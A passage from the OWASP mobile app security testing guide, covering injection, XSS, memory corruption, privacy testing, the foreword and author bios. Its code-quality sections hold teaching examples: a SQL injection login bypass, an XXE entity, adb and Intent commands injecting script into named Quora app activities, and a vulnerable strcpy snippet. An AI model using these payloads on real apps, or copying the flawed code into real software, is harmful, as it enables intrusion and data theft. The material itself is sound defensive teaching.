"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#sql-injection","title":"SQL Injection","text":"A SQL injection attack involves integrating SQL commands into input data, mimicking the syntax of a predefined SQL command. A successful SQL injection attack allows the attacker to read or write to the database and possibly execute administrative commands, depending on the permissions granted by the server.
Apps on both Android and iOS use SQLite databases as a means to control and organize local data storage. Assume an Android app handles local user authentication by storing the user credentials in a local database (a poor programming practice we\u2019ll overlook for the sake of this example). Upon login, the app queries the database to search for a record with the username and password entered by the user:
SQLiteDatabase db;\n\nString sql = \"SELECT * FROM users WHERE username = '\" + username + \"' AND password = '\" + password +\"'\";\n\nCursor c = db.rawQuery( sql, null );\n\nreturn c.getCount() != 0;\n
Let's further assume an attacker enters the following values into the \"username\" and \"password\" fields:
username = 1' or '1' = '1\npassword = 1' or '1' = '1\n
This results in the following query:
SELECT * FROM users WHERE username='1' OR '1' = '1' AND Password='1' OR '1' = '1'\n
Because the condition '1' = '1'
always evaluates as true, this query returns all records in the database, causing the login function to return true
even though no valid user account was entered.
Ostorlab exploited the sort parameter of Yahoo's weather mobile application with adb using this SQL injection payload.
Another real-world instance of client-side SQL injection was discovered by Mark Woods within the \"Qnotes\" and \"Qget\" Android apps running on QNAP NAS storage appliances. These apps exported content providers vulnerable to SQL injection, allowing an attacker to retrieve the credentials for the NAS device. A detailed description of this issue can be found on the Nettitude Blog.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#xml-injection","title":"XML Injection","text":"In an XML injection attack, the attacker injects XML meta-characters to structurally alter XML content. This can be used to either compromise the logic of an XML-based application or service, or possibly allow an attacker to exploit the operation of the XML parser processing the content.
A popular variant of this attack is XML eXternal Entity (XXE). Here, an attacker injects an external entity definition containing a URI into the input XML. During parsing, the XML parser expands the attacker-defined entity by accessing the resource specified by the URI. The integrity of the parsing application ultimately determines capabilities afforded to the attacker, where the malicious user could do any (or all) of the following: access local files, trigger HTTP requests to arbitrary hosts and ports, launch a cross-site request forgery (CSRF) attack, and cause a denial-of-service condition. The OWASP web testing guide contains the following example for XXE:
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <!DOCTYPE foo [ \n <!ELEMENT foo ANY >\n <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>\n
In this example, the local file /dev/random
is opened where an endless stream of bytes is returned, potentially causing a denial-of-service.
The current trend in app development focuses mostly on REST/JSON-based services as XML is becoming less common. However, in the rare cases where user-supplied or otherwise untrusted content is used to construct XML queries, it could be interpreted by local XML parsers, such as NSXMLParser on iOS. As such, said input should always be validated and meta-characters should be escaped.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-attack-vectors","title":"Injection Attack Vectors","text":"The attack surface of mobile apps is quite different from typical web and network applications. Mobile apps don't often expose services on the network, and viable attack vectors on an app's user interface are rare. Injection attacks against an app are most likely to occur through inter-process communication (IPC) interfaces, where a malicious app attacks another app running on the device.
Locating a potential vulnerability begins by either:
During a manual security review, you should employ a combination of both techniques. In general, untrusted inputs enter mobile apps through the following channels:
Verify that the following best practices have been followed:
We will cover details related to input sources and potentially vulnerable APIs for each mobile OS in the OS-specific testing guides.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#cross-site-scripting-flaws","title":"Cross-Site Scripting Flaws","text":"Cross-site scripting (XSS) issues allow attackers to inject client-side scripts into web pages viewed by users. This type of vulnerability is prevalent in web applications. When a user views the injected script in a browser, the attacker gains the ability to bypass the same origin policy, enabling a wide variety of exploits (e.g. stealing session cookies, logging key presses, performing arbitrary actions, etc.).
In the context of native apps, XSS risks are far less prevalent for the simple reason these kinds of applications do not rely on a web browser. However, apps using WebView components, such as WKWebView
or the deprecated UIWebView
on iOS and WebView
on Android, are potentially vulnerable to such attacks.
An older but well-known example is the local XSS issue in the Skype app for iOS, first identified by Phil Purviance. The Skype app failed to properly encode the name of the message sender, allowing an attacker to inject malicious JavaScript to be executed when a user views the message. In his proof-of-concept, Phil showed how to exploit the issue and steal a user's address book.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#static-analysis-security-testing-considerations","title":"Static Analysis - Security Testing Considerations","text":"Take a close look at any WebViews present and investigate for untrusted input rendered by the app.
XSS issues may exist if the URL opened by WebView is partially determined by user input. The following example is from an XSS issue in the Zoho Web Service, reported by Linus S\u00e4rud.
Java
webView.loadUrl(\"javascript:initialize(\" + myNumber + \");\");\n
Kotlin
webView.loadUrl(\"javascript:initialize($myNumber);\")\n
Another example of XSS issues determined by user input is public overridden methods.
Java
@Override\npublic boolean shouldOverrideUrlLoading(WebView view, String url) {\n if (url.substring(0,6).equalsIgnoreCase(\"yourscheme:\")) {\n // parse the URL object and execute functions\n }\n}\n
Kotlin
fun shouldOverrideUrlLoading(view: WebView, url: String): Boolean {\n if (url.substring(0, 6).equals(\"yourscheme:\", ignoreCase = true)) {\n // parse the URL object and execute functions\n }\n }\n
Sergey Bobrov was able to take advantage of this in the following HackerOne report. Any input to the HTML parameter would be trusted in Quora's ActionBarContentActivity. Payloads were successful using adb, clipboard data via ModalContentActivity, and Intents from 3rd party applications.
$ adb shell\n$ am start -n com.quora.android/com.quora.android.ActionBarContentActivity \\\n-e url 'http://test/test' -e html 'XSS<script>alert(123)</script>'\n
$ am start -n com.quora.android/com.quora.android.ModalContentActivity \\\n-e url 'http://test/test' -e html \\\n'<script>alert(QuoraAndroid.getClipboardData());</script>'\n
Intent i = new Intent();\ni.setComponent(new ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\"));\ni.putExtra(\"url\",\"http://test/test\");\ni.putExtra(\"html\",\"XSS PoC <script>alert(123)</script>\");\nview.getContext().startActivity(i);\n
val i = Intent()\ni.component = ComponentName(\"com.quora.android\",\n\"com.quora.android.ActionBarContentActivity\")\ni.putExtra(\"url\", \"http://test/test\")\ni.putExtra(\"html\", \"XSS PoC <script>alert(123)</script>\")\nview.context.startActivity(i)\n
If a WebView is used to display a remote website, the burden of escaping HTML shifts to the server side. If an XSS flaw exists on the web server, this can be used to execute script in the context of the WebView. As such, it is important to perform static analysis of the web application source code.
Verify that the following best practices have been followed:
Consider how data will be rendered in a response. For example, if data is rendered in an HTML context, there are six control characters that must be escaped:
Character Escaped & & < < > > \" " ' ' / /For a comprehensive list of escaping rules and other prevention measures, refer to the OWASP XSS Prevention Cheat Sheet.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations","title":"Dynamic Analysis - Security Testing Considerations","text":"XSS issues can be best detected using manual and/or automated input fuzzing, i.e. injecting HTML tags and special characters into all available input fields to verify the web application denies invalid inputs or escapes the HTML meta-characters in its output.
A reflected XSS attack refers to an exploit where malicious code is injected via a malicious link. To test for these attacks, automated input fuzzing is considered to be an effective method. For example, the BURP Scanner is highly effective in identifying reflected XSS vulnerabilities. As always with automated analysis, ensure all input vectors are covered with a manual review of testing parameters.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Memory corruption bugs are a popular mainstay with hackers. This class of bug results from a programming error that causes the program to access an unintended memory location. Under the right conditions, attackers can capitalize on this behavior to hijack the execution flow of the vulnerable program and execute arbitrary code. This kind of vulnerability occurs in a number of ways:
Buffer overflows: This describes a programming error where an app writes beyond an allocated memory range for a particular operation. An attacker can use this flaw to overwrite important control data located in adjacent memory, such as function pointers. Buffer overflows were formerly the most common type of memory corruption flaw, but have become less prevalent over the years due to a number of factors. Notably, awareness among developers of the risks in using unsafe C library functions is now a common best practice plus, catching buffer overflow bugs is relatively simple. However, it is still worth testing for such defects.
Out-of-bounds-access: Buggy pointer arithmetic may cause a pointer or index to reference a position beyond the bounds of the intended memory structure (e.g. buffer or list). When an app attempts to write to an out-of-bounds address, a crash or unintended behavior occurs. If the attacker can control the target offset and manipulate the content written to some extent, code execution exploit is likely possible.
Dangling pointers: These occur when an object with an incoming reference to a memory location is deleted or deallocated, but the object pointer is not reset. If the program later uses the dangling pointer to call a virtual function of the already deallocated object, it is possible to hijack execution by overwriting the original vtable pointer. Alternatively, it is possible to read or write object variables or other memory structures referenced by a dangling pointer.
Use-after-free: This refers to a special case of dangling pointers referencing released (deallocated) memory. After a memory address is cleared, all pointers referencing the location become invalid, causing the memory manager to return the address to a pool of available memory. When this memory location is eventually re-allocated, accessing the original pointer will read or write the data contained in the newly allocated memory. This usually leads to data corruption and undefined behavior, but crafty attackers can set up the appropriate memory locations to leverage control of the instruction pointer.
Integer overflows: When the result of an arithmetic operation exceeds the maximum value for the integer type defined by the programmer, this results in the value \"wrapping around\" the maximum integer value, inevitably resulting in a small value being stored. Conversely, when the result of an arithmetic operation is smaller than the minimum value of the integer type, an integer underflow occurs where the result is larger than expected. Whether a particular integer overflow/underflow bug is exploitable depends on how the integer is used. For example, if the integer type were to represent the length of a buffer, this could create a buffer overflow vulnerability.
Format string vulnerabilities: When unchecked user input is passed to the format string parameter of the printf
family of C functions, attackers may inject format tokens such as \u2018%c\u2019 and \u2018%n\u2019 to access memory. Format string bugs are convenient to exploit due to their flexibility. Should a program output the result of the string formatting operation, the attacker can read and write to memory arbitrarily, thus bypassing protection features such as ASLR.
The primary goal in exploiting memory corruption is usually to redirect program flow into a location where the attacker has placed assembled machine instructions referred to as shellcode. On iOS, the data execution prevention feature (as the name implies) prevents execution from memory defined as data segments. To bypass this protection, attackers leverage return-oriented programming (ROP). This process involves chaining together small, pre-existing code chunks (\"gadgets\") in the text segment where these gadgets may execute a function useful to the attacker or, call mprotect
to change memory protection settings for the location where the attacker stored the shellcode.
Android apps are, for the most part, implemented in Java which is inherently safe from memory corruption issues by design. However, native apps utilizing JNI libraries are susceptible to this kind of bug. In rare cases, Android apps that use XML/JSON parsers to unwrap Java objects are also subject to memory corruption bugs. An example of such vulnerability was found in the PayPal app.
Similarly, iOS apps can wrap C/C++ calls in Obj-C or Swift, making them susceptible to this kind of attack.
Example:
The following code snippet shows a simple example for a condition resulting in a buffer overflow vulnerability.
void copyData(char *userId) { \n char smallBuffer[10]; // size of 10 \n strcpy(smallBuffer, userId);\n } \n
To identify potential buffer overflows, look for uses of unsafe string functions (strcpy
, strcat
, other functions beginning with the \"str\" prefix, etc.) and potentially vulnerable programming constructs, such as copying user input into a limited-size buffer. The following should be considered red flags for unsafe string functions:
strcat
strcpy
strncat
strlcat
strncpy
strlcpy
sprintf
snprintf
gets
Also, look for instances of copy operations implemented as \"for\" or \"while\" loops and verify length checks are performed correctly.
Verify that the following best practices have been followed:
strcpy
, most other functions beginning with the \"str\" prefix, sprintf
, vsprintf
, gets
, etc.;memcpy
, make sure you check that the target buffer is at least of equal size as the source and that both buffers are not overlapping.Static code analysis of low-level code is a complex topic that could easily fill its own book. Automated tools such as RATS combined with limited manual inspection efforts are usually sufficient to identify low-hanging fruits. However, memory corruption conditions often stem from complex causes. For example, a use-after-free bug may actually be the result of an intricate, counter-intuitive race condition not immediately apparent. Bugs manifesting from deep instances of overlooked code deficiencies are generally discovered through dynamic analysis or by testers who invest time to gain a deep understanding of the program.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#dynamic-analysis-security-testing-considerations_1","title":"Dynamic Analysis Security Testing Considerations","text":"Memory corruption bugs are best discovered via input fuzzing: an automated black-box software testing technique in which malformed data is continually sent to an app to survey for potential vulnerability conditions. During this process, the application is monitored for malfunctions and crashes. Should a crash occur, the hope (at least for security testers) is that the conditions creating the crash reveal an exploitable security flaw.
Fuzz testing techniques or scripts (often called \"fuzzers\") will typically generate multiple instances of structured input in a semi-correct fashion. Essentially, the values or arguments generated are at least partially accepted by the target application, yet also contain invalid elements, potentially triggering input processing flaws and unexpected program behaviors. A good fuzzer exposes a substantial amount of possible program execution paths (i.e. high coverage output). Inputs are either generated from scratch (\"generation-based\") or derived from mutating known, valid input data (\"mutation-based\").
For more information on fuzzing, refer to the OWASP Fuzzing Guide.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#binary-protection-mechanisms","title":"Binary Protection Mechanisms","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#position-independent-code","title":"Position Independent Code","text":"PIC (Position Independent Code) is code that, being placed somewhere in the primary memory, executes properly regardless of its absolute address. PIC is commonly used for shared libraries, so that the same library code can be loaded in a location in each program address space where it does not overlap with other memory in use (for example, other shared libraries).
PIE (Position Independent Executable) are executable binaries made entirely from PIC. PIE binaries are used to enable ASLR (Address Space Layout Randomization) which randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#memory-management","title":"Memory Management","text":""},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#automatic-reference-counting","title":"Automatic Reference Counting","text":"ARC (Automatic Reference Counting) is a memory management feature of the Clang compiler exclusive to Objective-C and Swift. ARC automatically frees up the memory used by class instances when those instances are no longer needed. ARC differs from tracing garbage collection in that there is no background process that deallocates the objects asynchronously at runtime.
Unlike tracing garbage collection, ARC does not handle reference cycles automatically. This means that as long as there are \"strong\" references to an object, it will not be deallocated. Strong cross-references can accordingly create deadlocks and memory leaks. It is up to the developer to break cycles by using weak references. You can learn more about how it differs from Garbage Collection here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#garbage-collection","title":"Garbage Collection","text":"Garbage Collection (GC) is an automatic memory management feature of some languages such as Java/Kotlin/Dart. The garbage collector attempts to reclaim memory which was allocated by the program, but is no longer referenced\u2014also called garbage. The Android runtime (ART) makes use of an improved version of GC. You can learn more about how it differs from ARC here.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#manual-memory-management","title":"Manual Memory Management","text":"Manual memory management is typically required in native libraries written in C/C++ where ARC and GC do not apply. The developer is responsible for doing proper memory management. Manual memory management is known to enable several major classes of bugs into a program when used incorrectly, notably violations of memory safety or memory leaks.
More information can be found in \"Memory Corruption Bugs\".
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#stack-smashing-protection","title":"Stack Smashing Protection","text":"Stack canaries help prevent stack buffer overflow attacks by storing a hidden integer value on the stack right before the return pointer. This value is then validated before the return statement of the function is executed. A buffer overflow attack often overwrites a region of memory in order to overwrite the return pointer and take over the program flow. If stack canaries are enabled, they will be overwritten as well and the CPU will know that the memory has been tampered with.
Stack buffer overflow is a type of the more general programming vulnerability known as buffer overflow (or buffer overrun). Overfilling a buffer on the stack is more likely to derail program execution than overfilling a buffer on the heap because the stack contains the return addresses for all active function calls.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/","title":"Mobile App User Privacy Protection","text":""},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#overview","title":"Overview","text":"IMPORTANT DISCLAIMER: The MASTG is not a legal handbook and it will not go into the specifics of the GDPR or other possibly relevant legislation here. Instead, this chapter will introduce you to the topics related to user privacy protection, provide you with essential references for your own research efforts, and give you tests or guidelines that determine whether an app adheres to the privacy-related requirements listed in the OWASP MASVS.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-main-problem","title":"The Main Problem","text":"Mobile apps handle all kinds of sensitive user data, from identification and banking information to health data, so both the developers and the public are understandably concerned about how this data is handled and where it ends up. It is also worth discussing the \"benefits users get from using the apps\" vs \"the real price that they are paying for it\" (often without even being aware of it).
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-solution-pre-2020","title":"The Solution (pre-2020)","text":"To ensure that users are properly protected, legislation such as the European Union's General Data Protection Regulation (GDPR) in Europe have been developed and deployed (applicable since May 25, 2018). These laws can force developers to be more transparent regarding the handling of sensitive user data, which is usually implemented with privacy policies.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#the-challenge","title":"The Challenge","text":"Consider these dimensions of mobile app privacy:
Note: More often than not apps will claim to handle certain data, but in reality that's not the case. The IEEE article \"Engineering Privacy in Smartphone Apps: A Technical Guideline Catalog for App Developers\" by Majid Hatamian gives a very nice introduction to this topic.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#goals-for-data-protection","title":"Goals for Data Protection","text":"When an app requests personal information from a user, the user needs to know why the app needs that data and how it is used by the app. If there is a third party doing the actual processing of the data, the app should tell the user that too.
Like the classic triad of security protection goals: confidentiality, integrity, and availability, there are three protection goals that have been proposed for data protection:
For more details, see Section 5.1.1 \"Introduction to data protection goals\" in ENISA's \"Privacy and data protection in mobile applications\".
Since it is very challenging (if not impossible in many cases) to address both security and privacy protection goals at the same time, it is worth examining a visualization in IEEE's publication Protection Goals for Privacy Engineering called \"The Three Axes\" which helps us understand why we cannot reach 100% of all six goals simultaneously.
Though a privacy policy traditionally protects most of the these processes, that approach is not always optimal because:
In order to address these challenges and better inform users, Google and Apple have introduced new privacy labeling systems (very much along the lines of NIST's proposal) to help users easily understand how their data is being collected, handled, and shared, Consumer Software Cybersecurity Labeling. Their approaches can be seen at:
Since this is a new requirement on both platforms, these labels must be accurate in order to reassure users and mitigate abuse.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#google-ada-masa-program","title":"Google ADA MASA Program","text":"Since regular security testing helps developers identify key vulnerabilities in their apps, Google Play will allow developers who have completed independent security validation to inform users by disclosing this fact in the app's Data Safety section. The developer's commitment to security and privacy is meant to reassure users.
As part of the process to provide more transparency into the app's security architecture, Google has introduced the MASA (Mobile Application Security Assessment) program as part of the App Defense Alliance (ADA). Since MASA is a globally recognized standard for mobile app security to the mobile app ecosystem, Google is acknowledging the importance of security in this industry. Developers can work directly with an Authorized Lab partner to initiate a security assessment that is independently validated against a set of MASVS Level 1 requirements, and Google will recognize this effort by allowing them to disclose these tests in the app's Data Safety section.
If you are a developer and would like to participate, complete the Independent Security Review form.
Of course the testing is limited and it does not guarantee complete safety of the application. The independent review may not be scoped to verify the accuracy and completeness of a developer's Data Safety declarations, and developers remain solely responsible for making complete and accurate declarations in their app's Play Store listing.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#references","title":"References","text":"You can learn more about this and other privacy related topics here:
Security testers should be aware of Google Play's list of common privacy violations though it is not exhaustive. Some of the examples are below:
You can find more common violations in Google Play Console Help by going to Policy Centre -> Privacy, deception and device abuse -> User data.
As you might expect, these testing categories are related to each other. When you're testing them you're often indirectly testing for user privacy protection. This fact will help you provide better and more comprehensive reports. Often you'll be able to reuse evidence from other tests in order to test for User Privacy Protection.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-disclosure-of-data-privacy-on-the-app-marketplace","title":"Testing Disclosure of Data Privacy on the App Marketplace","text":"This document is only interested in determining which privacy-related information is being disclosed by the developers and discussing how to evaluate this information to decide if it seems reasonable (similarly as you'd do when testing for permissions).
While it is possible that the developers are not declaring certain information that is indeed being collected and\\/or shared, that is a topic for a different test. In this test, you are not supposed to provide privacy violation assurance.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#static-analysis","title":"Static Analysis","text":"To perform a static analysis, follow these steps:
The app passes the test as long as the developer has complied with the app marketplace guidelines and included the required labels and explanations. The developer's disclosures in the app marketplace should be stored as evidence, so that you can later use them to determine potential violations of privacy or data protection.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#dynamic-analysis","title":"Dynamic Analysis","text":"As an optional step, you can also provide some kind of evidence as part of this test. For instance, if you're testing an iOS app you can easily enable app activity recording and export a Privacy Report that contains detailed app access to different resources such as photos, contacts, camera, microphone, network connections, etc.
A dynamic analysis has many advantages for testing other MASVS categories and it provides very useful information that you can use to test network communication for MASVS-NETWORK or when testing app interaction with the platform for MASVS-PLATFORM. While testing these other categories, you might have taken similar measurements using other testing tools. You can also provide this as evidence for this test.
Though the information available should be compared against what the app is actually meant to do, this will be far from a trivial task that could take from several days to weeks to finish depending on your resources and the capabilities of your automated tools. These tests also heavily depend on the app functionality and context and should be ideally performed on a white box setup working very closely with the app developers.
"},{"location":"MASTG/General/0x04i-Testing-User-Privacy-Protection/#testing-user-education-on-security-best-practices","title":"Testing User Education on Security Best Practices","text":"Determining whether the app educates users and helps them understand security needs is especially challenging if you intend to automate the process. We recommend using the app extensively and try to answer the following questions whenever applicable:
Fingerprint usage: When fingerprints are used for authentication providing access to high-risk transactions/information,
does the app inform the user about potential issues when having multiple fingerprints of other people registered to the device as well?
Rooting/jailbreaking: When root or jailbreak detection is implemented,
does the app inform the user of the fact that certain high-risk actions will carry additional risk due to the jailbroken/rooted status of the device?
Specific credentials: When a user gets a recovery code, a password, or a pin from the application (or sets one),
does the app instruct the user to never share this with anyone else and that only the app will request it?
Application distribution: In case of a high-risk application and in order to prevent users from downloading compromised versions of the application,
does the app manufacturer properly communicate the official way of distributing the app (e.g. from Google Play or the App Store)?
Prominent Disclosure: In any case,
does the app display prominent disclosure of data access, collection, use, and sharing? e.g. does the app use the App Tracking Transparency Framework to ask for the permission on iOS?
Other references include:
Welcome to the OWASP Mobile Application Security Testing Guide. Feel free to explore the existing content, but do note that it may change at any time. New APIs and best practices are introduced in iOS and Android with every major (and minor) release and also vulnerabilities are found every day.
If you have feedback or suggestions, or want to contribute, create an issue on GitHub or ping us on Slack. See the README for instructions:
https://www.github.com/OWASP/owasp-mastg/
squirrel (noun plural): Any arboreal sciurine rodent of the genus Sciurus, such as S. vulgaris (red squirrel) or S. carolinensis (grey squirrel), having a bushy tail and feeding on nuts, seeds, etc.
On a beautiful summer day, a group of ~7 young men, a woman, and approximately three squirrels met in a Woburn Forest villa during the OWASP Security Summit 2017. So far, nothing unusual. But little did you know, within the next five days, they would redefine not only mobile application security, but the very fundamentals of book writing itself (ironically, the event took place near Bletchley Park, once the residence and work place of the great Alan Turing).
Or maybe that's going too far. But at least, they produced a proof-of-concept for an unusual security book. The Mobile Application Security Testing Guide (MASTG) is an open, agile, crowd-sourced effort, made of the contributions of dozens of authors and reviewers from all over the world.
Because this isn't a normal security book, the introduction doesn't list impressive facts and data proving the importance of mobile devices in this day and age. It also doesn't explain how mobile application security is broken, and why a book like this was sorely needed, and the authors don't thank their beloved ones without whom the book wouldn't have been possible.
We do have a message to our readers however! The first rule of the OWASP Mobile Application Security Testing Guide is: Don't just follow the OWASP Mobile Application Security Testing Guide. True excellence at mobile application security requires a deep understanding of mobile operating systems, coding, network security, cryptography, and a whole lot of other things, many of which we can only touch on briefly in this book. Don't stop at security testing. Write your own apps, compile your own kernels, dissect mobile malware, learn how things tick. And as you keep learning new things, consider contributing to the MASTG yourself! Or, as they say: \"Do a pull request\".
"},{"location":"MASTG/Intro/0x02a-Frontispiece/","title":"Frontispiece","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#about-the-owasp-mastg","title":"About the OWASP MASTG","text":"The OWASP Mobile Application Security Testing Guide (MASTG), which is part of the OWASP Mobile Application Security (MAS) flagship project, is a comprehensive manual covering the processes, techniques, and tools used during mobile application security analysis, as well as an exhaustive set of test cases for verifying the requirements listed in the OWASP Mobile Application Security Verification Standard (MASVS), providing a baseline for complete and consistent security tests.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASTG/Intro/0x02a-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"
Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software such as MS SQL Server, Adobe Flash Player, IBM Director, Cisco VOIP, and ModSecurity. If you can name it, he has probably broken it at least once. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer, which makes him a jack of all trades. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#co-authors","title":"Co-Authors","text":"Co-authors have consistently contributed quality content and have at least 2,000 additions logged in the GitHub repository.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#romuald-szkudlarek","title":"Romuald Szkudlarek","text":"Romuald is a passionate cyber security & privacy professional with over 15 years of experience in the web, mobile, IoT and cloud domains. During his career, he has been dedicating his spare time to a variety of projects with the goal of advancing the sectors of software and security. He is teaching regularly at various institutions. He holds CISSP, CCSP, CSSLP, and CEH credentials.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Although he started his career as a programmer, he found that it was more fun to take things apart than to put things together, and the switch to security was quickly made. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#vikas-gupta","title":"Vikas Gupta","text":"Vikas is an experienced cyber security researcher, with expertise in mobile security. In his career he has worked to secure applications for various industries including fintech, banks and governments. He enjoys reverse engineering, especially obfuscated native code and cryptography. He holds a master's degree in security and mobile computing, and an OSCP certification. He is always open to share his knowledge and exchange ideas.
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASTG GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-mastg/releases
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#disclaimer","title":"Disclaimer","text":"Please consult the laws in your country before executing any tests against mobile apps by utilizing the MASTG materials. Refrain from violating the laws with anything described in the MASTG.
Our [Code of Conduct] has further details: https://github.com/OWASP/owasp-mastg/blob/master/CODE_OF_CONDUCT.md
OWASP thanks the many authors, reviewers, and editors for their hard work in developing this guide. If you have any comments or suggestions, please connect with us: https://mas.owasp.org/contact
If you find any inconsistencies or typos please open an issue in the OWASP MASTG Github Repo: https://github.com/OWASP/owasp-mastg
"},{"location":"MASTG/Intro/0x02a-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/","title":"OWASP MASVS and MASTG Adoption","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#mobile-platform-providers","title":"Mobile Platform Providers","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#google-android","title":"Google Android","text":"Since 2021 Google has shown their support for the OWASP Mobile Security project (MASTG/MASVS) and has started providing continuous and high value feedback to the MASVS refactoring process via the App Defense Alliance (ADA) and its MASA (Mobile Application Security Assessment) program.
With MASA, Google has acknowledged the importance of leveraging a globally recognized standard for mobile app security to the mobile app ecosystem. Developers can work directly with an Authorized Lab partner to initiate a security assessment. Google will recognize developers who have had their applications independently validated against a set of MASVS Level 1 requirements and will showcase this on their Data safety section.
We thank Google, the ADA and all its members for their support and for their excellent work on protecting the mobile app ecosystem.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#certification-institutions","title":"Certification Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#crest","title":"CREST","text":"CREST is an international not-for-profit, membership body who quality assures its members and delivers professional certifications to the cyber security industry. CREST works with governments, regulators, academe, training partners, professional bodies and other stakeholders around the world.
In August 2022, CREST launched the OWASP Verification Standard (OVS) Programme. CREST OVS sets new standards for application security. Underpinned by OWASP's Application Security Verification Standard (ASVS) and Mobile Application Security Verification Standard (MASVS), CREST is leveraging the open-source community to build and maintain global standards to deliver a global web and mobile application security framework. This will provide assurance to the buying community that developers using CREST OVS accredited providers, always know that they are engaged with ethical and capable organisations with skilled and competent security testers by leveraging the OWASP ASVS and MASVS standards.
We thank CREST for their consultation regarding the OVS programme and its support to the open-source community to build and maintain global cyber security standards.
"},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#standardization-institutions","title":"Standardization Institutions","text":""},{"location":"MASTG/Intro/0x02b-MASVS-MASTG-Adoption/#nist-national-institute-of-standards-and-technology-united-states","title":"NIST (National Institute of Standards and Technology, United States)","text":"The National Institute of Standards and Technology (NIST) was founded in 1901 and is now part of the U.S. Department of Commerce. NIST is one of the nation's oldest physical science laboratories. Congress established the agency to remove a major challenge to U.S. industrial competitiveness at the time \u2014 a second-rate measurement infrastructure that lagged behind the capabilities of the United Kingdom, Germany and other economic rivals.
BSI stands for \"Federal Office for Information Security\", it has the goal to promote IT security in Germany and is the central IT security service provider for the federal government.
The mission of the ioXt Alliance is to build confidence in Internet of Things products through multi-stakeholder, international, harmonized, and standardized security and privacy requirements, product compliance programs, and public transparency of those requirements and programs.
In 2021, ioXt has extended its security principles through the Mobile Application profile, so that app developers can ensure their products are built with, and maintain, high cybersecurity standards such as the OWASP MASVS and the VPN Trust Initiative. The ioXt Mobile Application profile is a security standard that applies to any cloud connected mobile app and provides the much needed market transparency for consumer and commercial mobile app security.
Would you like to contribute with your case study? Connect with us!
